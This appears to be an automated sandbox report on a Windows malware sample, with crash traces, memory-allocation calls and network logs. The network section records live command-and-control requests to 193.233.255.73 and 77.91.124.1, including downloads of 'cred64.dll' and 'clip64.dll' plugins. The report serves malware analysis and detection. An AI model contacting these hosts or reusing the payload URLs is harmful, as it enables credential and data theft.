_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb5022
0x4fb4c48
0x7af105
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008060
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008068
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 44623304
1 0 0

__exception__

 stacktrace: 
0x4fb4d6d
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb5022
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008060
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008068
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 46120340
1 0 0

__exception__

 stacktrace: 
0x4fb4d6d
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://193.233.255.73/loghub/master
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.124.1/theme/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.1/theme/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.1/theme/Plugins/clip64.dll
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
request GET http://77.91.124.1/theme/Plugins/cred64.dll
request GET http://77.91.124.1/theme/Plugins/clip64.dll
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://www.youtube.com/
request GET https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F
request GET https://fonts.googleapis.com/css?family=YouTube+Sans:500
request GET https://fonts.googleapis.com/css?family=Roboto:400,500
request GET https://www.youtube.com/img/desktop/supported_browsers/yt_logo_rgb_light.png
request GET https://www.youtube.com/img/desktop/supported_browsers/dinosaur.png
request GET https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxM.woff
request GET https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc-.woff
request GET https://accounts.google.com/
request GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywD2xgLxszRIN_7MaKSoUaoYTMvRFg50b2S5b8UluthbcUsGRE-8e1g-xdevGcqP20z4uow
request GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeywTlS8RSTMSloorftkjj1lY_2tWmEzy5429BwqOoerpQlAzoTk3QhoMS2hENHZmnLEtBloUjQ&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1023002296%3A1698047601366063
request GET https://www.youtube.com/img/desktop/supported_browsers/chrome.png
request GET https://www.youtube.com/img/desktop/supported_browsers/edgium.png
request GET https://fonts.gstatic.com/s/youtubesans/v19/Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF.woff
request GET https://www.youtube.com/img/desktop/supported_browsers/opera.png
request GET https://www.youtube.com/img/desktop/supported_browsers/firefox.png
request GET https://www.youtube.com/favicon.ico
request GET https://accounts.google.com/_/bscframe
request GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request GET https://accounts.google.com/favicon.ico
request GET https://accounts.google.com/generate_204?S178ZQ
request GET https://www.google.com/favicon.ico
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725ab000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00562000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x714ea000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73741000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f8b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d46e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d2eb000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 3252721
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252721
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252370
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252370
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252016
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252016
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251544
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251544
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251358
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251358
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
Application Crash Process iexplore.exe with pid 1356 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
